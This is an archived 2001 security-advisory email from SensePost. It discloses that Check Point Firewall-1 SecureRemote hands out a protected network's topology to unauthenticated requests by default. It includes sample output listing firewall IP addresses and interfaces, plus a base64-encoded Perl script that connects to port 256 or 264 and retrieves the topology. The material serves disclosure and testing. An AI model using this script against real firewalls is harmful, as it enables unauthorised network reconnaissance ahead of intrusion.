Date: Wed, 18 Jul 2001 03:29:28 +0200 (SAST)
From: Haroon Meer <haroon@sensepost.com.>
To: [email protected]Subject: Firewall-1 Information leak
--0-2039710078-995418972=:16828
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.BSF.4.21.0107180316321.16856@snitterly.sensepost.com.>
Hi.
Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including ip addresses, network masks (and even friendly
descriptions)
The attached file will connect to the firewall, and download the
toplogy (if SecureRemote is running)
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1)
--snip--
SensePost# perl sr.pl firewall.victim.com
Testing on port 256
:val (
:reply (
: (-SensePost-dotcom-.hal9000-19.3.167.186
:type (gateway)
:is_fwz (true)
:is_isakmp (true)
:certificates ()
:uencapport (2746)
:fwver (4.1)
:ipaddr (19.3.167.186)
:ipmask (255.255.255.255)
:resolve_multiple_interfaces ()
:ifaddrs (
: (16.3.167.186)
: (12.20.240.1)
: (16.3.170.1)
: (29.203.37.97)
)
:firewall (installed)
:location (external)
:keyloc (remote)
:userc_crypt_ver (1)
:keymanager (
:type (refobj)
:refname ("#_-SensePost-dotcom-")
) :name
(-SensePost-dotcom-Neo16.3.167.189)
:type (gateway)
:ipaddr (172.29.0.1)
:ipmask (255.255.255.255)
)
--snip--
Haroon Meer
+27 837866637
[email protected]
http://www.sensepost.com
--0-2039710078-995418972=:16828
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="sr.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.21.0107180316120.16828@snitterly.sensepost.com.>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME="sr.pl"
IyEvdXNyL2Jpbi9wZXJsDQojIEEgQ29tbWFuZC1saW5lIHRvb2wgdGhhdCBj
YW4gYmUgdXNlZCB0byBkb3dubG9hZCBuZXR3b3JrIFRvcG9sb2d5DQojIGZy
b20gRmlyZXdhbGwtMSdzIHJ1bm5pbmcgU2VjdXJlUmVtb3RlLCB3aXRoIHRo
ZSBvcHRpb24gIkFsbG93IHVuDQojIGF1dGhlbnRpY2F0ZWQgY2xlYXJ0ZXh0
IHRvcG9sb2d5IGRvd25sb2FkcyIuDQojIFVzYWdlIHNyLnBsIElQDQojIEhh
cm9vbiBNZWVyICYgUm9lbG9mIFRlbW1pbmdoIDIwMDEvMDcvMTcNCiMgaGFy
b29uQHNlbnNlcG9zdC5jb20gLSBodHRwOi8vd3d3LnNlbnNlcG9zdC5jb20N
Cg0KdXNlIFNvY2tldDsNCmlmICgkI0FSR1Y8MCkge2RpZSAiVXNhZ2U6IHNy
LnBsIElQXG4iO30NCg0KJHBvcnQ9MjU2Ow0KJHRhcmdldD1pbmV0X2F0b24o
JEFSR1ZbMF0pOw0KcHJpbnQgIlRlc3RpbmcgJGhvc3Qgb24gcG9ydCAkcG9y
dFxuIjsNCg0KJFNFTkRZPSI0MTAwMDAwMDAyNTkwNTIxMDAwMDAwMDRjNDFl
NDM1MjAwMDAwMDRlMjg3NDZmNzA2ZjZjNmY2Nzc5MmQ3MjY1NzE3NTY1NzM3
NDBhMDkzYTYzNjE2ZTYxNmQ2NTIwMjgyZDUzNjU2ZTczNjU1MDZmNzM3NDJk
NjQ2Zjc0NjM2ZjZkMmQyOTBhMDkzYTYzNjg2MTZjNmM2NTZlNjc2NTIwMjg2
MzMyNjUzMjMzMzEzODMzMzk2NDMwNjYyOTBhMjkwYTAwIjsNCiRTRU5EWSA9
IHBhY2soIkgqIiwkU0VORFkpOw0KDQpAcmVzdWx0cz1zZW5kcmF3KCRTRU5E
WSk7DQoNCmlmICgkI3Jlc3VsdHMgPT0gMCkgew0KIHByaW50ICJObyByZXN1
bHRzIG9uIHBvcnQgMjU2IC0gdHJ5aW5nIDI2NFxuIjsNCiAkcG9ydD0yNjQ7
DQogQHJlc3VsdHMyPXNlbmRyYXcoJFNFTkRZKTsgDQogaWYgKCQjcmVzdWx0
czIgPT0gMCkge2RpZSAiU29ycnkgLSBubyByZXN1bHRzXG4iO30NCn0gZWxz
ZSB7cHJpbnQgQHJlc3VsdHM7fQ0KDQpzdWIgc2VuZHJhdyB7DQogbXkgKCRw
c3RyKT1AXzsNCiBzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHBy
b3RvYnluYW1lKCd0Y3AnKXx8MCkgfHwgZGllKCJTb2NrZXQgcHJvYmxlbXNc
biIpOw0KIGlmKGNvbm5lY3QoUyxwYWNrICJTbkE0eDgiLDIsJHBvcnQsJHRh
cmdldCkpew0KICBteSBAaW47DQogIHNlbGVjdChTKTsgICAgICAkfD0xOyAg
IHByaW50ICRwc3RyOw0KICB3aGlsZSg8Uz4peyBwdXNoIEBpbiwgJF87fQ0K
ICBzZWxlY3QoU1RET1VUKTsgY2xvc2UoUyk7IHJldHVybiBAaW47DQogfSBl
bHNlIHsgcmV0dXJuICIiOyB9DQp9DQojIFNwaWRlcm1hcms6IHNlbnNlcG9z
dGRhdGEgZncxDQoNCg0K
--0-2039710078-995418972=:16828--
